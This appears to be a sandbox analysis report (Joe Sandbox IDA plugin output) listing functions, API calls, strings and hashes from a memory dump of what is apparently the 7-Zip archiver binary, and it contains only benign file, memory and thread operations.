                                Strings
                                Similarity
                                • API ID:
                                • String ID: a$z
                                • API String ID: 0-4151050625
                                • Opcode ID: 6ae0dc97e00bf20445782d7632547404e64b5bc7cdb6d7c8bcc16cb23f98946c
                                • Instruction ID: ef4fa0efca9c915425799369eeeb09f40b8555c163e801a609f67e931131adc2
                                • Opcode Fuzzy Hash: 6ae0dc97e00bf20445782d7632547404e64b5bc7cdb6d7c8bcc16cb23f98946c
                                • Instruction Fuzzy Hash: AF01D176B0D055C9DB207F156B443F95351A711B95F8D41338F0A87301EA9C59F2E30E
                                APIs
                                Strings
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: RtlGetVersion$ntdll.dll
                                • API String ID: 1646373207-1489217083
                                • Opcode ID: 3270b66177bae0e4f37cbf032a5b585ff5bf23b06b314f74da539d27339d0187
                                • Instruction ID: 5bee21ea830a95e3dc15abf5ab8cee94762f3597f3eb81ea26745f525f578605
                                • Opcode Fuzzy Hash: 3270b66177bae0e4f37cbf032a5b585ff5bf23b06b314f74da539d27339d0187
                                • Instruction Fuzzy Hash: DBF04F31609700D6EE30DB20E5843EA23E0E798318F540826D70E42750EB7CC995CE89
                                APIs
                                • fputs.MSVCRT ref: 0046BD9B
                                • fputs.MSVCRT ref: 0046BDC8
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                Strings
                                Similarity
                                • API ID: fputs$free
                                • String ID: Open archive: $StdOut
                                • API String ID: 3873070119-2401103298
                                • Opcode ID: 259d005b7b975df63041c016e984978adc1b57a87d4006b95cd48e7fee3ee52f
                                • Instruction ID: 8fa44a115ca32a3c04df6dfa669ff680118849953bec09a67667fab892899e1f
                                • Opcode Fuzzy Hash: 259d005b7b975df63041c016e984978adc1b57a87d4006b95cd48e7fee3ee52f
                                • Instruction Fuzzy Hash: 03F03AE531198081CE459F26DA843991321EB84FD8F18D4328E0E8B718EF28C4D9C304
                                APIs
                                Strings
                                Similarity
                                • API ID: fputs$fputc
                                • String ID: $:
                                • API String ID: 1185151155-4041779174
                                • Opcode ID: f5960870aff27ab24c9c1dd5abc4ad69187a291fb0c5e0ce632aed7b778ae011
                                • Instruction ID: 6763fbd81d9d2fa16c2503a32dcee1d932a76e7985570cf754bf2f74a761291f
                                • Opcode Fuzzy Hash: f5960870aff27ab24c9c1dd5abc4ad69187a291fb0c5e0ce632aed7b778ae011
                                • Instruction Fuzzy Hash: D2E06DE630878082CB159B26E94439D6321EB99FDCF488122DF8E07B5ADF6CC188C715
                                APIs
                                Strings
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: GetLargePageMinimum$kernel32.dll
                                • API String ID: 1646373207-2515562745
                                • Opcode ID: 8e9a9dab5b7f2e19df094af4520333db7a13ff35ee5bd9949f6b110a8c73edde
                                • Instruction ID: 39f0b685d939d741628749837bc60bceda74a92e8b2eec32f8a789c3c4bbaf91
                                • Opcode Fuzzy Hash: 8e9a9dab5b7f2e19df094af4520333db7a13ff35ee5bd9949f6b110a8c73edde
                                • Instruction Fuzzy Hash: 21E0E6E5B57B06C1EE45DB51FC9532523647B84740F84066A860E83370FF3CD949C349
                                APIs
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                • free.MSVCRT ref: 0041B9EE
                                • free.MSVCRT ref: 0041BB01
                                • free.MSVCRT ref: 0041BB4B
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: 1edef8d2d17e7871c7b36134c7c96cf4c91f11fedf76d5df42718696c7cc1c0f
                                • Instruction ID: c31e0b977c88c470eb095bedb4445449ecb5f85eafee1bd4dae91a796306d0f3
                                • Opcode Fuzzy Hash: 1edef8d2d17e7871c7b36134c7c96cf4c91f11fedf76d5df42718696c7cc1c0f
                                • Instruction Fuzzy Hash: E241E67321854095CA20EF16E0900EEA721EBD57D8B445227FA9F47B69DF3CC9C6CB89
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 31f3892dfa6178f8f9ff0b2c81836e69a63e742398415a8d620e122b4eac7c34
                                • Instruction ID: 77aac4f33f53287caae4abeee5db639b4e96a0c8cff86c616d4c9d9bf797a827
                                • Opcode Fuzzy Hash: 31f3892dfa6178f8f9ff0b2c81836e69a63e742398415a8d620e122b4eac7c34
                                • Instruction Fuzzy Hash: 2F411723315B9097CB20DE22E5502AE6360F785BF4F884216EE9E47B54EF3CC9A5CB05
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorLastfree
                                • String ID:
                                • API String ID: 2167247754-0
                                • Opcode ID: 9e5ac0819ccd73d860c5bb0ac35cb87d2fcfabdfe1c81ef86ca79644d4d74276
                                • Instruction ID: aa564fda5a29deb5161dec622c1acb42d2b8035fe7c01f832aad4952ec2b5951
                                • Opcode Fuzzy Hash: 9e5ac0819ccd73d860c5bb0ac35cb87d2fcfabdfe1c81ef86ca79644d4d74276
                                • Instruction Fuzzy Hash: C7312E3225554455CA30EB26E5513EE6721EBD13E8F400317FAAA87AA5DE2CCCD7C70E
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ErrorLastmemmove
                                • String ID:
                                • API String ID: 3561842085-0
                                • Opcode ID: 91663e74d70eaacb513d60a4784cfbb330a645ba5be1881762ea54d7b565f1b6
                                • Instruction ID: 7d37d53894940bcedac8ca1f7d1d6eecb2e7417fecc3460e36bee4bf1fedecca
                                • Opcode Fuzzy Hash: 91663e74d70eaacb513d60a4784cfbb330a645ba5be1881762ea54d7b565f1b6
                                • Instruction Fuzzy Hash: 9821B66220464555DB20EB22F8417EA6320E7D57E8F44132BFEAD876D5DF6CC98AC708
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                • Opcode ID: a891cb515865a68be5e6a03bd8abd97aaf33105ab184db28d6fece49421a2b41
                                • Instruction ID: ae93e9628ea9000b8202b0258fd6a4e8ee2623b53c6d2d52b57f951dcbb30684
                                • Opcode Fuzzy Hash: a891cb515865a68be5e6a03bd8abd97aaf33105ab184db28d6fece49421a2b41
                                • Instruction Fuzzy Hash: 4C1191E6309745A1FB149B2B99403E923659766FC4FC44426DE0A47315FF7CC986D30D
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                • Opcode ID: 5001601b6dd0e9dc131b0f3698d5251bc58e879868400dfb826f7ca5e64397d1
                                • Instruction ID: 9da40836006195614ed4ea3872f11b7de369a6d7b733b15a189c3a06e9deb977
                                • Opcode Fuzzy Hash: 5001601b6dd0e9dc131b0f3698d5251bc58e879868400dfb826f7ca5e64397d1
                                • Instruction Fuzzy Hash: E411BFA630974091EB04DF2B99403A923619B16FDAF844026CF094738AFB6CCA4AD30E
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414272
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041427E
                                • _CxxThrowException.MSVCRT ref: 0041429C
                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004142C8
                                • _CxxThrowException.MSVCRT ref: 004142E6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                • String ID:
                                • API String ID: 2296236218-0
                                • Opcode ID: 44c1d27728ff92053e539249098bfb9970b541923050162c49c8805df1a7c07d
                                • Instruction ID: b8fec9e85e9cd8a25fc2801ab3dad24c40bc8cfa666d30cfd869764f98303c8b
                                • Opcode Fuzzy Hash: 44c1d27728ff92053e539249098bfb9970b541923050162c49c8805df1a7c07d
                                • Instruction Fuzzy Hash: 602193B2704B4586D710DF56E85075EB7A1FB98B88F54812ADB8D83B24EF3CC885C708
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: aa15c429ddaab6e7a21c021ac8bfe6753cb256810df34c54073a5922f3fe802c
                                • Instruction ID: 960523f708549476db93a4f64dfefed781a26ea14c0092f8e3bc6ee54219c57b
                                • Opcode Fuzzy Hash: aa15c429ddaab6e7a21c021ac8bfe6753cb256810df34c54073a5922f3fe802c
                                • Instruction Fuzzy Hash: 6A118B3225454992CA10FB26F4513DEA320FBD1398F801217F69DC76A9DFACC995CB48
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: a8389d49ebc912c1b78d46df2f351949851e287fcb576c4ad785c454a533a5d9
                                • Instruction ID: 160e889afbc2277dbf9a3213bde3a9152f1d284ad9ab03140a260991831e8a72
                                • Opcode Fuzzy Hash: a8389d49ebc912c1b78d46df2f351949851e287fcb576c4ad785c454a533a5d9
                                • Instruction Fuzzy Hash: 0101A533742A5D96CA10EB36E5105AD6310E785FA8B584326DF395B7A0CF2CC8A28308
                                APIs
                                • free.MSVCRT ref: 0043C057
                                  • Part of subcall function 00438E64: free.MSVCRT ref: 00438E74
                                  • Part of subcall function 00438E64: free.MSVCRT ref: 00438E7D
                                  • Part of subcall function 00438E64: free.MSVCRT ref: 00438EA8
                                  • Part of subcall function 00438E64: free.MSVCRT ref: 00438EB0
                                  • Part of subcall function 00439930: free.MSVCRT ref: 00439962
                                  • Part of subcall function 00439930: free.MSVCRT ref: 0043996B
                                  • Part of subcall function 00439930: free.MSVCRT ref: 00439974
                                  • Part of subcall function 00439930: free.MSVCRT ref: 0043997C
                                • free.MSVCRT ref: 0043C072
                                • free.MSVCRT ref: 0043C07B
                                • free.MSVCRT ref: 0043C0A6
                                • free.MSVCRT ref: 0043C0AE
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 51f15b651d00e51d326922a6f601ad02451ce5b0bdb61253a7e8b2723f3faaf4
                                • Instruction ID: 7492e7021409b5569118f5a194135951d21da006904901f344001d57f2256e35
                                • Opcode Fuzzy Hash: 51f15b651d00e51d326922a6f601ad02451ce5b0bdb61253a7e8b2723f3faaf4
                                • Instruction Fuzzy Hash: 94F0A223741A9896CA14EA37DA911AC1320AB84F98B480227AF2D9F751DF58CCB28344
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 57650b3b88bf0d0f50e31ce842fe8f779f29f1a674ce84d465df258e08a5fb3d
                                • Instruction ID: 17520fc483ee104575a4cec5a594cb627ee1291454e9aa9aed0cb4cea764ff80
                                • Opcode Fuzzy Hash: 57650b3b88bf0d0f50e31ce842fe8f779f29f1a674ce84d465df258e08a5fb3d
                                • Instruction Fuzzy Hash: 29F0C223B5194886D711EE3BE9502AC1320AB81FE8B5D0227DE2D5B364DE68CC928304
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: e564a7ea03bf336738886359d3ffe7a8aafeb4ebfbf7f9a7706ddaf490634256
                                • Instruction ID: be632c62114c7ef758912198de0a766f07550c3c48de3d48b5284417ca99e41f
                                • Opcode Fuzzy Hash: e564a7ea03bf336738886359d3ffe7a8aafeb4ebfbf7f9a7706ddaf490634256
                                • Instruction Fuzzy Hash: 3CF0AF23741A8C8A9B10AE37E9910AD12209F85BE874C0636EF1D4B700DE68CCA28344
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 3f6ba1c832bdc57f2aade2322f716c71dab9e2d6315d7be1efef08c08254ca37
                                • Instruction ID: 4dd18e0329008573594547a32aae8477eee3acf275ed7b888d4b8a55f793173f
                                • Opcode Fuzzy Hash: 3f6ba1c832bdc57f2aade2322f716c71dab9e2d6315d7be1efef08c08254ca37
                                • Instruction Fuzzy Hash: A8F06223741A898ACB11AE3BE9510AD1321AB95FED7580227AE2D5F355DE6CCC92C344
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 220e844c16fe5fbc67ee198f903663c6704053668a6464895724f781ceb88cc1
                                • Instruction ID: 18a5fa1f44d29c9b517db5d61a7d9194714d9acf253c2125ff6710dcd9688a71
                                • Opcode Fuzzy Hash: 220e844c16fe5fbc67ee198f903663c6704053668a6464895724f781ceb88cc1
                                • Instruction Fuzzy Hash: 1CF0C263B41A888ADB10BE37ED8129C1214EF45BEDB4C4636EE1D5B750DF68CCA38340
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 69aaf988170bd5df535a70f46f762111c31b67bf07b1f82691828dd78cfcb4cb
                                • Instruction ID: 4fcf5d09abd5fdacc50303738207a6e6dab9245585b3546680f2bdc33fae46fc
                                • Opcode Fuzzy Hash: 69aaf988170bd5df535a70f46f762111c31b67bf07b1f82691828dd78cfcb4cb
                                • Instruction Fuzzy Hash: 48F06223755A5D868711AE37FA510AD1320AB95FD87590227EE2D9F354DE6CCC928304
                                APIs
                                • free.MSVCRT ref: 00466B57
                                • free.MSVCRT ref: 00466B63
                                • free.MSVCRT ref: 00466B6F
                                • free.MSVCRT ref: 00466B86
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B629
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B636
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B642
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B64C
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B656
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B660
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B66A
                                  • Part of subcall function 0046B604: free.MSVCRT ref: 0046B674
                                • free.MSVCRT ref: 00466B9C
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 61d0609e7619a37457f59db048ca76362673db0d964c2751e3e4b42c7523d082
                                • Instruction ID: d8c4d499aa62b2f9d6d3c275653ebe3049d0ea2c8f3c2d6937ceca0c078fa044
                                • Opcode Fuzzy Hash: 61d0609e7619a37457f59db048ca76362673db0d964c2751e3e4b42c7523d082
                                • Instruction Fuzzy Hash: B3F0FE3234174992CA18AB33E7952EC1320EB89B98F840126AF1D9B711DF6CD9F28345
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: e9d31e9b3cf5b050249e2f7d49395da2eb8981ae7d163e8eb79dc2eec26a846d
                                • Instruction ID: 12fe8fdc6ac188a103d715ea968a37d85c2ada990a76863c03b144ca5cbf8048
                                • Opcode Fuzzy Hash: e9d31e9b3cf5b050249e2f7d49395da2eb8981ae7d163e8eb79dc2eec26a846d
                                • Instruction Fuzzy Hash: 6DE0AC72741A4D93CB04AA37DB9106C6324F785FA875442169F2D9B751DF68DCF28344
                                APIs
                                  • Part of subcall function 0042E708: free.MSVCRT ref: 0042E760
                                  • Part of subcall function 0042E708: free.MSVCRT ref: 0042E76B
                                • free.MSVCRT ref: 00434470
                                Similarity
                                • API ID: free
                                • String ID: AES128$AES192$`3G
                                • API String ID: 1294909896-508572792
                                APIs
                                • free.MSVCRT ref: 004643BD
                                  • Part of subcall function 00412CF8: _CxxThrowException.MSVCRT ref: 00412D3A
                                • free.MSVCRT ref: 004643DD
                                • free.MSVCRT ref: 004643E7
                                  • Part of subcall function 00412E68: free.MSVCRT ref: 00412EA0
                                Similarity
                                • API ID: free$ExceptionThrow
                                • String ID: =
                                • API String ID: 4001284683-2525689732
                                APIs
                                • free.MSVCRT ref: 00455EA0
                                  • Part of subcall function 004138A8: free.MSVCRT ref: 004138E0
                                  • Part of subcall function 004136A8: memmove.MSVCRT ref: 004136CD
                                • free.MSVCRT ref: 00455E92
                                Similarity
                                • API ID: free$memmove
                                • String ID: exe
                                • API String ID: 1534225298-1801697008
                                Similarity
                                • API ID: free
                                • String ID: Cannot open input file
                                • API String ID: 1294909896-2161566465
                                Similarity
                                • API ID: free$ByteStringmemmove
                                • String ID:
                                • API String ID: 400576877-0
                                APIs
                                  • Part of subcall function 00414D94: _CxxThrowException.MSVCRT ref: 00414D83
                                • strlen.MSVCRT ref: 0043FB27
                                • free.MSVCRT ref: 0043FB74
                                Similarity
                                • API ID: ExceptionThrowfreestrlen
                                • String ID: <>G$sums
                                • API String ID: 265379646-1542415585
                                Similarity
                                • API ID: free$wcscmp
                                • String ID:
                                • API String ID: 4021281200-0
                                Similarity
                                • API ID: free
                                • String ID: Unsupported charset:
                                • API String ID: 1294909896-616772432
                                APIs
                                  • Part of subcall function 004186C8: GetFileAttributesW.KERNELBASE ref: 004186EA
                                  • Part of subcall function 004186C8: GetFileAttributesW.KERNEL32 ref: 00418721
                                  • Part of subcall function 004186C8: free.MSVCRT ref: 0041872E
                                • DeleteFileW.KERNEL32 ref: 004174BC
                                • DeleteFileW.KERNEL32 ref: 004174F6
                                • free.MSVCRT ref: 00417506
                                • free.MSVCRT ref: 00417514
                                  • Part of subcall function 00416FCC: SetFileAttributesW.KERNELBASE ref: 00416FF3
                                Similarity
                                • API ID: File$Attributesfree$Delete
                                • String ID:
                                • API String ID: 324319583-0
                                Similarity
                                • API ID: free$ErrorLastmemmove
                                • String ID: :
                                • API String ID: 3561842085-3653984579
                                Similarity
                                • API ID: ErrorLast$FileHandleRead
                                • String ID:
                                • API String ID: 2244327787-0
                                Similarity
                                • API ID: fputs
                                • String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
                                • API String ID: 1795875747-932691680
                                Similarity
                                • API ID: DirectoryRemovefree
                                • String ID:
                                • API String ID: 736856642-0
                                APIs
                                • _beginthreadex.MSVCRT ref: 0046DC05
                                • SetThreadAffinityMask.KERNEL32 ref: 0046DC21
                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00430036), ref: 0046DC2A
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00430036), ref: 0046DC35
                                Similarity
                                • API ID: Thread$AffinityErrorLastMaskResume_beginthreadex
                                • String ID:
                                • API String ID: 3268521904-0
                                APIs
                                • WaitForSingleObject.KERNEL32(?,?,?,?,0042DC82), ref: 0046DB0B
                                • GetLastError.KERNEL32(?,?,?,?,0042DC82), ref: 0046DB15
                                • CloseHandle.KERNEL32(?,?,?,?,0042DC82), ref: 0046DB30
                                • GetLastError.KERNEL32(?,?,?,?,0042DC82), ref: 0046DB3A
                                Similarity
                                • API ID: ErrorLast$CloseHandleObjectSingleWait
                                • String ID:
                                • API String ID: 1796208289-0
                                Similarity
                                • API ID: fputs$fputcfree
                                • String ID:
                                • API String ID: 3819637083-0
                                APIs
                                • memmove.MSVCRT ref: 00463C15
                                  • Part of subcall function 0046266C: CompareFileTime.KERNEL32(?,?,?,00000000,00463C28), ref: 004626B1
